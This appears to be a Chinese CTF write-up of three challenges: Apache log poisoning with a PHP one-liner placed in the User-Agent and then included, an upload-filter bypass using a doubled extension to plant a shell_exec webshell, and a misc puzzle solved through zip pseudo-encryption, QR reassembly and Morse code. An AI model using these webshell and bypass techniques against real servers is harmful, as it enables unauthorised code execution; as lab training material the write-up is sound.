1.web-文件包含进阶

找apache的log日志，通过 POST 请求传入
hust=/var/log/apache2/access.log
设置 User-Agent 为 php 一句话木马

<?php system('cat fl4g.php');?>

查看源代码即可

2.web-简单文件上传

分析源码，考虑编写一句话木马，命名为CTF1.pphphp，双写绕过后缀过滤

<?php
  echo "<pre>";
echo shell_exec("cat /flag");
echo "</pre>";
?>

访问http://172.17.0.15:13625/uploads/c864ee9341358fb890e189f4571f2af9.php得到flag

3.misc-BB空间

附件是压缩包，winhex修改标志位破解伪加密，解压得到二维码碎片，加上占位符拼图得到完整二维码

扫码得到435075905，这是B站一个up的UID号，看他第一个作品的简介

这是摩斯电码，转化关系：哦=. 啊=- 诶=/

打开智能字幕（不是很智能，“诶”识别不出来）

哦啊啊诶哦诶哦啊啊啊啊诶啊哦啊哦诶啊啊啊啊啊诶哦诶啊啊诶啊哦啊啊诶哦哦啊哦诶哦啊哦诶哦哦诶哦诶啊哦诶啊哦哦诶哦哦哦哦哦，转化一下得到.–/./.—-/-.-./—–/–/./–/-.–/..-./.-./.././-./-../…..，解码得到
vmc{we1c0memyfriend5}